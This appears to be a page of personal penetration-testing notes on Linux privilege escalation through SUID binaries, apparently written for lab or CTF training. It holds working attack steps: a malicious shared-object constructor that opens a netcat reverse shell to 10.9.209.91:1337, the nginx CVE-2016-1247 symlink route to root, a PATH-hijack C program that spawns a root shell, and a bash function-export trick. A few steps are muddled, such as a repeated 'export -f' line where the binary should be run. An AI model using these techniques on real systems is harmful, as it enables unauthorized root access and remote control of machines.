SUID

Overview

4 bits for READ, 2 bits for WRITE and 1 bit for EXECUTE. chmod 777 would be rwx across the board

Files with SUID (Set User ID) permissions allows the file to ran with permissions of another specified user

Searching for Files with SUID

find / -perm -u=s -type f 2>/dev/null

find / -type f -perm -04000 -ls 2>/dev/null

Escalation via Shared Object Injection

find / -type f -perm -04000 -ls 2>/dev/null

Note down any interesting binaries and run them to see what they do

The strace debugging tool can be used to monitor and trace/track what a binary does when its ran.

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

We want to find output that says "No such file or directory". We can then overwrite the file path/file with something malicious that will give us a root shell.

Check to see if the file path is writeable and create malicious .so file

#include <stdio.h>
#include <sys/types.h>

static void inject() __attribute__((constructor));
void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/nc 10.9.209.91 1337 -e '/tmp/bash -p'");
}

gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

Then run the original binary file

Escalation via Binary Symlinks

This has to do with a vulnerability Nginx and utilizing SUID to escalate to root.

Because of the way that the logs are being created by Nginx and how their permissions are set, we can leveraged this to go from a www-data user to root.

linux-exploit-suggester.sh
[+] [CVE-2016-1247] nginxed-root.sh

Manually find it with dpkg. Any version <= 1.6.2 is vulnerable

dpkg -l | grep nginx

Next find out if there is a SUID bit on /usr/bin/sudo

find / -type f -perm -04000 -ls 2>/dev/null

Now we can create a Symlink between one of the Nginx log files and a malicious file so when it runs it runs as root

We need a startup/restart of the Nginx server for the malicious file to run

Run the nginxed-root.sh tool and wait for Nginx to restart

Escalation via Environmental Variables

Environmental variables are variables that are available system wide and are inherited spawned by all child processes and shells

Check what the environmental variables on the machine are

env

Find a binary with the SUID bit

find / -type f -perm -04000 -ls 2>/dev/null

Read the strings of binary files

strings /usr/local/bin/suid-env

While digging through the files you may come across the program trying to run another binary just by its name without using the full path. It can only do this because of the /usr/local/bin environment variable set in the shell.

We can exploit this by changing the env binary path of service and replacing it with a malicious service binary file

Spawn root shell binary file as a one liner

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c

Compile

gcc /tmp/service.c -o /tmp/service

Change the $PATH variable and call the orginal binary

export PATH=/tmp:$PATH
/usr/local/bin/suid-env

ALTERNATIVE

In the case that the binary is calling a full path a function with the name service can be made with that spawns a new shell

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

export the function ( the -f means refer to shell function)

export -f /usr/sbin/service

Run the original binary

export -f /usr/sbin/service

PreviousCVE-2019-18634 (pwfeedback)NextVulnversity

Last updated 9 months ago

Was this helpful?